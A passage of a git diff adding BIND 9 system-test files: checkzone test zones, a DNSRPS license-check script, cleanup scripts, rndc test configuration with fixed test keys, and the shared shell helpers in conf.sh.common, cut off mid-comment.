marka.isc.org. a.root.servers.nil. ( + 2026 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +example.com. DNAME example.net. +example.com. NS ns.example.com +ns.example.com. A 192.168.0.2 diff --git a/bin/tests/system/checkzone/zones/spf.db b/bin/tests/system/checkzone/zones/spf.db new file mode 100644 index 0000000..9527b1b --- /dev/null +++ b/bin/tests/system/checkzone/zones/spf.db @@ -0,0 +1,18 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 0 IN SOA . . 0 0 0 0 0 +@ 0 IN NS . +@ 0 IN TXT "v=spf1 -all" +@ 0 IN SPF "v=spf1 -all" +x 0 IN TXT "v=spf1" +y 0 IN SPF "v=spf1" +y 0 IN TXT "a non spf record" diff --git a/bin/tests/system/checkzone/zones/test1.db b/bin/tests/system/checkzone/zones/test1.db new file mode 100644 index 0000000..55669d7 --- /dev/null +++ b/bin/tests/system/checkzone/zones/test1.db @@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ SOA ns hostmaster 2012010901 3600 1200 604800 1200 + NS ns +ns A 192.0.2.1 + +addr1 A 10.53.0.1 diff --git a/bin/tests/system/checkzone/zones/test2.db b/bin/tests/system/checkzone/zones/test2.db new file mode 100644 index 0000000..0cb1184 --- /dev/null +++ b/bin/tests/system/checkzone/zones/test2.db @@ -0,0 +1,18 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 +@ SOA ns hostmaster 2012010902 3600 1200 604800 1200 + NS ns +ns A 192.0.2.1 + +addr1 A 10.53.0.1 +addr2 A 10.53.0.2 diff --git a/bin/tests/system/checkzone/zones/warn.inherit.origin.db b/bin/tests/system/checkzone/zones/warn.inherit.origin.db new file mode 100644 index 0000000..a348a8f --- /dev/null +++ b/bin/tests/system/checkzone/zones/warn.inherit.origin.db @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 0 IN SOA . . 0 0 0 0 0 +$ORIGIN @ +$INCLUDE "zones/inherit.db" diff --git a/bin/tests/system/checkzone/zones/warn.inherited.owner.db b/bin/tests/system/checkzone/zones/warn.inherited.owner.db new file mode 100644 index 0000000..dbbd9d1 --- /dev/null +++ b/bin/tests/system/checkzone/zones/warn.inherited.owner.db @@ -0,0 +1,13 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 0 IN SOA . . 0 0 0 0 0 +$INCLUDE "zones/inherit.db" @ diff --git a/bin/tests/system/ckdnsrps.sh b/bin/tests/system/ckdnsrps.sh new file mode 100644 index 0000000..99ccb6c --- /dev/null +++ b/bin/tests/system/ckdnsrps.sh @@ -0,0 +1,168 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +set -e + +# Say on stdout whether to test DNSRPS +# and create dnsrps.conf and dnsrps-slave.conf +# Note that dnsrps.conf and dnsrps-slave.conf are included in named.conf +# and differ from dnsrpz.conf which is used by dnsrpzd. + + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DNSRPS_CMD=../rpz/dnsrps + +AS_NS= +TEST_DNSRPS= +MCONF=dnsrps.conf +SCONF=dnsrps-slave.conf +USAGE="$0: [-xAD] [-M dnsrps.conf] [-S dnsrps-slave.conf]" +while getopts "xADM:S:" c; do + case $c in + x) set -x; DEBUG=-x;; + A) AS_NS=yes;; + D) TEST_DNSRPS=yes;; + M) MCONF="$OPTARG";; + S) SCONF="$OPTARG";; + *) echo "$USAGE" 1>&2; exit 1;; + esac +done +shift `expr $OPTIND - 1 || true` +if [ "$#" -ne 0 ]; then + echo "$USAGE" 1>&2 + exit 1 +fi + +# erase any existing conf files +cat /dev/null > $MCONF +cat /dev/null > $SCONF + +add_conf () { + echo "$*" >>$MCONF + echo "$*" >>$SCONF +} + +if ! $FEATURETEST --enable-dnsrps; then + if [ -n "$TEST_DNSRPS" ]; then + add_conf "## DNSRPS disabled at compile time" + fi + add_conf "#skip" + exit 0 +fi + +if [ -z "$TEST_DNSRPS" ]; then + add_conf "## testing with native RPZ" + add_conf '#skip' + exit 0 +else + add_conf "## testing with DNSRPS" +fi + +if [ ! -x "$DNSRPS_CMD" ]; then + add_conf "## make $DNSRPS_CMD to test DNSRPS" + add_conf '#skip' + exit 0 +fi + +if $DNSRPS_CMD -a >/dev/null; then : +else + add_conf "## DNSRPS provider library is not available" + add_conf '#skip' + exit 0 +fi + +CMN=" dnsrps-options { dnsrpzd-conf ../dnsrpzd.conf + dnsrpzd-sock ../dnsrpzd.sock + dnsrpzd-rpzf ../dnsrpzd.rpzf + dnsrpzd-args '-dddd -L stdout' + log-level 3" + +MASTER="$CMN" +if [ -n "$AS_NS" ]; then + MASTER="$MASTER + qname-as-ns yes + ip-as-ns yes" +fi + +# write dnsrps settings for master resolver +cat <<EOF >>$MCONF +$MASTER }; +EOF + +# write dnsrps settings for resolvers that should not start dnsrpzd +cat <<EOF >>$SCONF +$CMN + dnsrpzd '' }; # do not start dnsrpzd +EOF + + +# DNSRPS is available. +# The test should fail if the license is bad. +add_conf "dnsrps-enable yes;" + +# Use alt-dnsrpzd-license.conf if it exists +CUR_L=dnsrpzd-license-cur.conf +ALT_L=alt-dnsrpzd-license.conf +# try ../rpz/alt-dnsrpzd-license.conf if alt-dnsrpzd-license.conf does not exist +[ -s $ALT_L ] || ALT_L=../rpz/alt-dnsrpzd-license.conf +if [ -s $ALT_L ]; then + SRC_L=$ALT_L + USE_ALT= +else + SRC_L=../rpz/dnsrpzd-license.conf + USE_ALT="## consider installing alt-dnsrpzd-license.conf" +fi +cp $SRC_L $CUR_L + +# parse $CUR_L for the license zone name, master IP addresses, and optional +# transfer-source IP addresses +eval `sed -n -e 'y/ABCDEFGHIJKLMNOPQRSTUVWXYZ/abcdefghijklmnopqrstuvwxyz/'\ + -e 's/.*zone *\([-a-z0-9]*.license.fastrpz.com\).*/NAME=\1/p' \ + -e 's/.*farsight_fastrpz_license *\([0-9.]*\);.*/IPV4=\1/p' \ + -e 's/.*farsight_fastrpz_license *\([0-9a-f:]*\);.*/IPV6=\1/p' \ + -e 's/.*transfer-source *\([0-9.]*\);.*/TS4=-b\1/p' \ + -e 's/.*transfer-source *\([0-9a-f:]*\);.*/TS6=-b\1/p' \ + -e 's/.*transfer-source-v6 *\([0-9a-f:]*\);.*/TS6=-b\1/p' \ + $CUR_L` +if [ -z "$NAME" ]; then + add_conf "## no DNSRPS tests; no license domain name in $SRC_L" + add_conf '#fail' + exit 0 +fi +if [ -z "$IPV4" ]; then + IPV4=license1.fastrpz.com + TS4= +fi +if [ -z "$IPV6" ]; then + IPV6=license1.fastrpz.com + TS6= +fi + +# This TSIG key is common and NOT a secret +KEY='hmac-sha256:farsight_fastrpz_license:f405d02b4c8af54855fcebc1' + +# Try IPv4 and then IPv6 to deal with IPv6 tunnel and connectivity problems +if `$DIG -4 -t axfr -y$KEY $TS4 $NAME @$IPV4 \ + | grep -i "^$NAME.*TXT" >/dev/null`; then + exit 0 +fi +if `$DIG -6 -t axfr -y$KEY $TS6 $NAME @$IPV6 \ + | grep -i "^$NAME.*TXT" >/dev/null`; then + exit 0 +fi + +add_conf "## DNSRPS lacks a valid license via $SRC_L" +[ -z "$USE_ALT" ] || add_conf "$USE_ALT" +add_conf '#fail' diff --git a/bin/tests/system/cleanall.sh b/bin/tests/system/cleanall.sh new file mode 100644 index 0000000..e5cc477 --- /dev/null +++ b/bin/tests/system/cleanall.sh @@ -0,0 +1,37 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Clean up after system tests. +# + +SYSTEMTESTTOP=. +. $SYSTEMTESTTOP/conf.sh + + +find . -type f \( \ + -name '*~' -o -name 'core' -o -name '*.core' \ + -o -name '*.log' -o -name '*.pid' -o -name '*.keyset' \ + -o -name named.run -o -name ans.run \ + -o -name '*-valgrind-*.log' \) -print | xargs rm -f + +status=0 + +rm -f $SYSTEMTESTTOP/random.data + +for d in $SUBDIRS +do + test ! -f $d/clean.sh || ( cd $d && $SHELL clean.sh ) + rm -f test.output.$d + test -d $d && find $d -type d -exec rmdir '{}' \; 2> /dev/null +done diff --git a/bin/tests/system/cleanpkcs11.sh b/bin/tests/system/cleanpkcs11.sh new file mode 100644 index 0000000..ff8acd0 --- /dev/null +++ b/bin/tests/system/cleanpkcs11.sh @@ -0,0 +1,18 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +. "$SYSTEMTESTTOP/conf.sh" + +PK11DELBIN=$(echo "$PK11DEL" | awk '{ print $1 }') + +[ -x "$PK11DELBIN" ] && $PK11DEL -w0 > /dev/null 2>&1 diff --git a/bin/tests/system/common/controls.conf.in b/bin/tests/system/common/controls.conf.in new file mode 100644 index 0000000..3712885 --- /dev/null +++ b/bin/tests/system/common/controls.conf.in @@ -0,0 +1,22 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + diff --git a/bin/tests/system/common/rndc.conf b/bin/tests/system/common/rndc.conf new file mode 100644 index 0000000..b887ec3 --- /dev/null +++ b/bin/tests/system/common/rndc.conf @@ -0,0 +1,21 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + default-key "rndc_key"; +}; + +key rndc_key { + algorithm hmac-sha256; + secret "1234abcd8765"; +}; diff --git a/bin/tests/system/common/rndc.key b/bin/tests/system/common/rndc.key new file mode 100644 index 0000000..3ef41c3 --- /dev/null +++ b/bin/tests/system/common/rndc.key @@ -0,0 +1,15 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; diff --git a/bin/tests/system/common/root.hint b/bin/tests/system/common/root.hint new file mode 100644 index 0000000..e0f186c --- /dev/null +++ b/bin/tests/system/common/root.hint @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 999999 +. IN NS a.root-servers.nil. +a.root-servers.nil. IN A 10.53.0.1 diff --git a/bin/tests/system/conf.sh.common b/bin/tests/system/conf.sh.common new file mode 100644 index 0000000..e87acca --- /dev/null +++ b/bin/tests/system/conf.sh.common @@ -0,0 +1,744 @@ +#!/bin/sh +# +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +testsock6() { + if test -n "$PERL" && $PERL -e "use IO::Socket::INET6;" 2> /dev/null + then + $PERL "$TOP/bin/tests/system/testsock6.pl" "$@" + else + false + fi +} + +export LANG=C + +. ${TOP}/version + +# +# Common lists of system tests to run. +# +# The following tests are hard-coded to use ports 5300 and 9953. For +# this reason, these must be run sequentially. +# +# Sequential tests that only run on unix/linux should be added to +# SEQUENTIAL_UNIX in conf.sh.in; those that only run on windows should +# be added to SEQUENTIAL_WINDOWS in conf.sh.win32. +# +SEQUENTIAL_COMMON="ecdsa eddsa tkey" + +# +# These tests can use ports assigned by the caller (other than 5300 +# and 9953). Because separate blocks of ports can be used for teach +# test, these tests can be run in parallel. +# +# Parallel tests that only run on unix/linux should be added to +# PARALLEL_UNIX in conf.sh.in; those that only run on windows should +# be added to PARALLEL_WINDOWS in conf.sh.win32. +# +# Note: some of the longer-running tests such as serve-stale and +# rpzrecurse are scheduled first, in order to get more benefit from +# parallelism. +# +PARALLEL_COMMON="dnssec rpzrecurse serve-stale dupsigs \ +acl \ +additional \ +addzone \ +allow-query \ +auth \ +autosign \ +builtin \ +cacheclean \ +case \ +catz \ +cds \ +chain \ +checkconf \ +checkds \ +checknames \ +checkzone \ +database \ +digdelv \ +dlz \ +dlzexternal \ +dns64 \ +dscp \ +dsdigest \ +dyndb \ +ednscompliance \ +emptyzones \ +fetchlimit \ +filter-aaaa \ +formerr \ +forward \ +geoip2 \ +glue \ +idna \ +inline \ +integrity \ +ixfr \ +journal \ +kasp \ +keepalive \ +keymgr2kasp \ +legacy \ +limits \ +masterfile \ +masterformat \ +metadata \ +mirror \ +mkeys \ +names \ +notify \ +nsec3 \ +nslookup \ +nsupdate \ +nzd2nzf \ +padding \ +pending \ +pipelined \ +qmin \ +reclimit \ +redirect \ +resolver \ +rndc \ +rootkeysentinel \ +rpz \ +rrchecker \ +rrl \ +rrsetorder \ +rsabigexponent \ +runtime \ +sfcache \ +shutdown \ +smartsign \ +sortlist \ +spf \ +staticstub \ +statistics \ +statschannel \ +stress \ +stub \ +synthfromdnssec \ +timeouts \ +tcp \ +tools \ +tsig \ +tsiggss \ +ttl \ +unknown \ +upforwd \ +verify \ +views \ +wildcard \ +xfer \ +xferquota \ +zero \ +zonechecks" + +# +# Set up color-coded test output +# +if [ ${SYSTEMTEST_FORCE_COLOR:-0} -eq 1 ] || test -t 1 && type tput > /dev/null 2>&1 && tput setaf 7 > /dev/null 2>&1 ; then + export COLOR_END=`tput setaf 4` # blue + export COLOR_FAIL=`tput setaf 1` # red + export COLOR_INFO=`tput bold` # bold + export COLOR_NONE=`tput sgr0` + export COLOR_PASS=`tput setaf 2` # green + export COLOR_START=`tput setaf 4` # blue + export COLOR_WARN=`tput setaf 3` # yellow +else + # set to empty strings so printf succeeds + export COLOR_END='' + export COLOR_FAIL='' + export COLOR_INFO='' + export COLOR_NONE='' + export COLOR_PASS='' + export COLOR_START='' + export COLOR_WARN='' +fi + +export SYSTESTDIR="`basename $PWD`" + +if type printf > /dev/null 2>&1 +then + echofail () { + printf "${COLOR_FAIL}%s${COLOR_NONE}\n" "$*" + } + echowarn () { + printf "${COLOR_WARN}%s${COLOR_NONE}\n" "$*" + } + echopass () { + printf "${COLOR_PASS}%s${COLOR_NONE}\n" "$*" + } + echoinfo () { + printf "${COLOR_INFO}%s${COLOR_NONE}\n" "$*" + } + echostart () { + printf "${COLOR_START}%s${COLOR_NONE}\n" "$*" + } + echoend () { + printf "${COLOR_END}%s${COLOR_NONE}\n" "$*" + } + echo_i() { + printf '%s\n' "$*" | while IFS= read -r __LINE ; do + echoinfo "I:$SYSTESTDIR:$__LINE" + done + } + + echo_ic() { + printf '%s\n' "$*" | while IFS= read -r __LINE ; do + echoinfo "I:$SYSTESTDIR: $__LINE" + done + } + + echo_d() { + printf '%s\n' "$*" | while IFS= read -r __LINE ; do + echoinfo "D:$SYSTESTDIR:$__LINE" + done + } +else + echofail () { + echo "$*" + } + echowarn () { + echo "$*" + } + echopass () { + echo "$*" + } + echoinfo () { + echo "$*" + } + echostart () { + echo "$*" + } + echoend () { + echo "$*" + } + + echo_i() { + echo "$@" | while IFS= read -r __LINE ; do + echoinfo "I:$SYSTESTDIR:$__LINE" + done + } + + echo_ic() { + echo "$@" | while IFS= read -r __LINE ; do + echoinfo "I:$SYSTESTDIR: $__LINE" + done + } + + echo_d() { + echo "$@" | while IFS= read -r __LINE ; do + echoinfo "D:$SYSTESTDIR:$__LINE" + done + } +fi + +cat_i() { + while IFS= read -r __LINE ; do + echoinfo "I:$SYSTESTDIR:$__LINE" + done +} + +cat_d() { + while IFS= read -r __LINE ; do + echoinfo "D:$SYSTESTDIR:$__LINE" + done +} + +digcomp() { + output=`$PERL $SYSTEMTESTTOP/digcomp.pl "$@"` + result=$? + [ -n "$output" ] && { echo "digcomp failed:"; echo "$output"; } | cat_i + return $result +} + +start_server() { + $PERL "$TOP_SRCDIR/bin/tests/system/start.pl" "$SYSTESTDIR" "$@" +} + +stop_server() { + $PERL "$TOP_SRCDIR/bin/tests/system/stop.pl" "$SYSTESTDIR" "$@" +} + +send() { + $PERL "$TOP_SRCDIR/bin/tests/system/send.pl" "$@" +} + +# +# Useful variables in test scripts +# + +# The following script sets the following algorithm-related variables. These +# are selected randomly at runtime from a list of supported algorithms. The +# randomization is deterministic and remains stable for a period of time for a +# given platform. +# +# Default algorithm for testing. +# DEFAULT_ALGORITHM +# DEFAULT_ALGORITHM_NUMBER +# DEFAULT_BITS +# +# This is an alternative algorithm for test cases that require more than one +# algorithm (for example algorithm rollover). Must be different from +# DEFAULT_ALGORITHM. +# ALTERNATIVE_ALGORITHM +# ALTERNATIVE_ALGORITHM_NUMBER +# ALTERNATIVE_BITS +# +# This is an algorithm that is used for tests against the "disable-algorithms" +# configuration option. Must be different from above algorithms. +# DISABLED_ALGORITHM +# DISABLED_ALGORITHM_NUMBER +# DISABLED_BITS +# +# There are multiple algoritms sets to choose from (see get_algorithms.py). To +# override the default choice, set the ALGORITHM_SET env var (see mkeys system +# test for example). +if test -x "$PYTHON" && test -x "$KEYGEN"; then + eval "$($PYTHON "$TOP_SRCDIR/bin/tests/system/get_algorithms.py")" +else + # 9.16 workarounds + # - for ./configure which calls bin/tests/system/cleanall.sh, which + # includes this file before $KEYGEN is compiled + # - for our Windows CI which lacks Python + DEFAULT_ALGORITHM=ECDSAP256SHA256 + DEFAULT_ALGORITHM_NUMBER=13 + DEFAULT_BITS=256 + ALTERNATIVE_ALGORITHM=RSASHA256 + ALTERNATIVE_ALGORITHM_NUMBER=8 + ALTERNATIVE_BITS=1280 + DISABLED_ALGORITHM=ECDSAP384SHA384 + DISABLED_ALGORITHM_NUMBER=14 + DISABLED_BITS=384 +fi + +# Default HMAC algorithm. +export DEFAULT_HMAC=hmac-sha256 + +# +# Useful functions in test scripts +# + +# assert_int_equal: compare two integer variables, $1 and $2 +# +# If $1 and $2 are equal, return 0; if $1 and $2 are not equal, report +# the error using the description of the tested variable provided in $3 +# and return 1. +assert_int_equal() { + found="$1" + expected="$2" + description="$3" + + if [ "${expected}" -ne "${found}" ]; then + echo_i "incorrect ${description}: got ${found}, expected ${expected}" + return 1 + fi + + return 0 +} + +# keyfile_to_keys_section: helper function for keyfile_to_*_keys() which +# converts keyfile data into a key-style trust anchor configuration +# section using the supplied parameters +keyfile_to_keys() { + section_name=$1 + key_prefix=$2 + shift + shift + echo "$section_name {" + for keyname in $*; do + awk '!/^; /{ + printf "\t\""$1"\" " + printf "'"$key_prefix "'" + printf $4 " " $5 " " $6 " \"" + for (i=7; i<=NF; i++) printf $i + printf "\";\n" + }' $keyname.key + done + echo "};" +} + +# keyfile_to_dskeys_section: helper function for keyfile_to_*_dskeys() +# converts keyfile data into a DS-style trust anchor configuration +# section using the supplied parameters +keyfile_to_dskeys() { + section_name=$1 + key_prefix=$2 + shift + shift + echo "$section_name {" + for keyname in $*; do + $DSFROMKEY $keyname.key | \ + awk '!/^; /{ + printf "\t\""$1"\" " + printf "'"$key_prefix "'" + printf $4 " " $5 " " $6 " \"" + for (i=7; i<=NF; i++) printf $i + printf "\";\n" + }' + done + echo "};" +} + +# keyfile_to_trusted_keys: convert key data contained in the keyfile(s) +# provided to a "trust-keys" section suitable for including in a +# resolver's configuration file +keyfile_to_trusted_keys() { + keyfile_to_keys "trusted-keys" "" $* +} + +# keyfile_to_static_keys: convert key data contained in the keyfile(s) +# provided to a *static-key* "trust-anchors" section suitable for including in +# a resolver's configuration file +keyfile_to_static_keys() { + keyfile_to_keys "trust-anchors" "static-key" $* +} + +# keyfile_to_initial_keys: convert key data contained in the keyfile(s) +# provided to an *initial-key* "trust-anchors" section suitable for including +# in a resolver's configuration file +keyfile_to_initial_keys() { + keyfile_to_keys "trust-anchors" "initial-key" $* +} + +# keyfile_to_static_ds_keys: convert key data contained in the keyfile(s) +# provided to a *static-ds* "trust-anchors" section suitable for including in a +# resolver's configuration file +keyfile_to_static_ds() { + keyfile_to_dskeys "trust-anchors" "static-ds" $* +} + +# keyfile_to_initial_ds_keys: convert key data contained in the keyfile(s) +# provided to an *initial-ds* "trust-anchors" section suitable for including +# in a resolver's configuration file +keyfile_to_initial_ds() { + keyfile_to_dskeys "trust-anchors" "initial-ds" $* +} + +# keyfile_to_key_id: convert a key file name to a key ID +# +# For a given key file name (e.g. "Kexample.+013+06160") provided as $1, +# print the key ID with leading zeros stripped ("6160" for the +# aforementioned example). +keyfile_to_key_id() { + echo "$1" | sed "s/.*+0\{0,4\}//" +} + +# private_type_record: write a private type record recording the state of the +# signing process +# +# For a given zone ($1), algorithm number ($2) and key file ($3), print the +# private type record with default type value of 65534, indicating that the +# signing process for this key is completed. +private_type_record() { + _zone=$1 + _algorithm=$2 + _keyfile=$3 + + _id=$(keyfile_to_key_id "$_keyfile") + + printf "%s. 0 IN TYPE65534 %s 5 %02x%04x0000\n" "$_zone" "\\#" "$_algorithm" "$_id" +} + +# nextpart*() - functions for reading files incrementally +# +# These functions aim to facilitate looking for (or waiting for) +# messages which may be logged more than once throughout the lifetime of +# a given named instance by outputting just the part of the file which +# has been appended since the last time we read it. +# +# Calling some of these functions causes temporary *.prev files to be +# created that need to be cleaned up manually (usually by a given system +# test's clean.sh script). +# +# Note that unlike other nextpart*() functions, nextpartread() is not +# meant to be directly used in system tests; its sole purpose is to +# reduce code duplication below. +# +# A quick usage example: +# +# $ echo line1 > named.log +# $ echo line2 >> named.log +# $ nextpart named.log +# line1 +# line2 +# $ echo line3 >> named.log +# $ nextpart named.log +# line3 +# $ nextpart named.log +# $ echo line4 >> named.log +# $ nextpartpeek named.log +# line4 +# $ nextpartpeek named.log +# line4 +# $ nextpartreset named.log +# $ nextpartpeek named.log +# line1 +# line2 +# line3 +# line4 +# $ nextpart named.log +# line1 +# line2 +# line3 +# line4 +# $ nextpart named.log +# $ + +# nextpartreset: reset the marker used by nextpart() and nextpartpeek() +# so that it points to the start of the given file +nextpartreset() { + echo "0" > $1.prev +} + +# nextpartread: read everything that's been appended to a file since the +# last time nextpart() was called and print it to stdout, print the +# total number of lines read from that file so far to file descriptor 3 +nextpartread() { + [ -f $1.prev ] || nextpartreset $1 + prev=`cat $1.prev` + awk "NR > $prev "'{ print } + END { print NR > "/dev/stderr" }' $1 2>&3 +} + +# nextpart: read everything that's been appended to a file since the +# last time nextpart() was called +nextpart() { + nextpartread $1 3> $1.prev.tmp + mv $1.prev.tmp $1.prev +} + +# nextpartpeek: read everything that's been appended to a file since the +# last time nextpart() was called +nextpartpeek() { + nextpartread $1 3> /dev/null +} + +# _search_log: look for message $1 in file $2 with nextpart(). +_search_log() ( + msg="$1" + file="$2" + nextpart "$file" | grep -F -e "$msg" > /dev/null +) + +# _search_log_peek: look for message $1 in file $2 with nextpartpeek(). +_search_log_peek() ( + msg="$1" + file="$2" + nextpartpeek "$file" | grep -F -e "$msg" > /dev/null +) + +# wait_for_log: wait until message $2 in file $3 appears. Bail out after +# $1 seconds. This needs to be used in conjunction with a prior call to +# nextpart() or nextpartreset() on the same file to guarantee the offset is +# set correctly. Tests using wait_for_log() are responsible for cleaning up +# the created <file>.prev files. +wait_for_log() ( + timeout="$1" + msg="$2" + file="$3" + retry_quiet "$timeout" _search_log "$msg" "$file" && return 0 + echo_i "exceeded time limit waiting for '$msg' in $file" + return 1 +) + +# wait_for_log_peek: similar to wait_for_log() but peeking, so the file offset +# does not change. +wait_for_log_peek() ( + timeout="$1" + msg="$2" + file="$3" + retry_quiet "$timeout" _search_log_peek "$msg" "$file" && return 0 + echo_i "exceeded time limit waiting for '$msg' in $file" + return 1 +) + +# _retry: keep running a command until it succeeds, up to $1 times, with +# one-second intervals, optionally printing a message upon every attempt +_retry() { + __retries="${1}" + shift + + while :; do + if "$@"; then + return 0 + fi + __retries=$((__retries-1)) + if [ "${__retries}" -gt 0 ]; then + if [ "${__retry_quiet}" -ne 1 ]; then + echo_i "retrying" + fi + sleep 1 + else + return 1 + fi + done +} + +# retry: call _retry() in verbose mode +retry() { + __retry_quiet=0 + _retry "$@" +} + +# retry_quiet: call _retry() in silent mode +retry_quiet() { + __retry_quiet=1 + _retry "$@" +} + +# _repeat: keep running command up to $1 times, unless it fails +_repeat() ( + __retries="${1}" + shift + while :; do + if ! "$@"; then + return 1 + fi + __retries=$((__retries-1)) + if [ "${__retries}" -le 0 ]; then + break + fi + done + return 0 +) + +rndc_reload() { + $RNDC -c ../common/rndc.conf -s $2 -p ${CONTROLPORT} reload $3 2>&1 | sed 's/^/'"I:$SYSTESTDIR:$1"' /' + # reloading single zone is synchronous, if we're reloading whole server + # we need to wait for reload to finish + if [ -z "$3" ]; then + for __try in 0 1 2 3 4 5 6 7 8 9; do + $RNDC -c ../common/rndc.conf -s $2 -p ${CONTROLPORT} status | grep "reload/reconfig in progress" > /dev/null || break + sleep 1 + done + fi +} + +rndc_reconfig() { + $RNDC -c ../common/rndc.conf -s $2 -p ${CONTROLPORT} reconfig 2>&1 | sed 's/^/'"I:$SYSTESTDIR:$1"' /' + for __try in 0 1 2 3 4 5 6 7 8 9; do + $RNDC -c ../common/rndc.conf -s $2 -p ${CONTROLPORT} status | grep "reload/reconfig in progress" > /dev/null || break + sleep 1 + done +} + +# rndc_dumpdb: call "rndc dumpdb [...]" and wait until it completes +# +# The first argument is the name server instance to send the command to, in the +# form of "nsX" (where "X" is the instance number), e.g. "ns5". The remaining +# arguments, if any, are appended to the rndc command line after "dumpdb". +# +# Control channel configuration for the name server instance to send the +# command to must match the contents of bin/tests/system/common/rndc.conf. +# +# rndc output is stored in a file called rndc.out.test${n}; the "n" variable is +# required to be set by the calling tests.sh script. +# +# Return 0 if the dump completes successfully; return 1 if rndc returns an exit +# code other than 0 or if the "; Dump complete" string does not appear in the +# dump within 10 seconds. +rndc_dumpdb() { + __ret=0 + __dump_complete=0 + __server="${1}" + __ip="10.53.0.$(echo "${__server}" | tr -c -d "0-9")" + + shift + ${RNDC} -c ../common/rndc.conf -p "${CONTROLPORT}" -s "${__ip}" dumpdb "$@" > "rndc.out.test${n}" 2>&1 || __ret=1 + + for _ in 0 1 2 3 4 5 6 7 8 9 + do + if grep '^; Dump complete$' "${__server}/named_dump.db" > /dev/null; then + mv "${__server}/named_dump.db" "${__server}/named_dump.db.test${n}" + __dump_complete=1 + break + fi + sleep 1 + done + + if [ ${__dump_complete} -eq 0 ]; then + echo_i "timed out waiting for 'rndc dumpdb' to finish" + __ret=1 + fi + + return ${__ret} +} + +# get_dig_xfer_stats: extract transfer statistics from dig output stored +# in 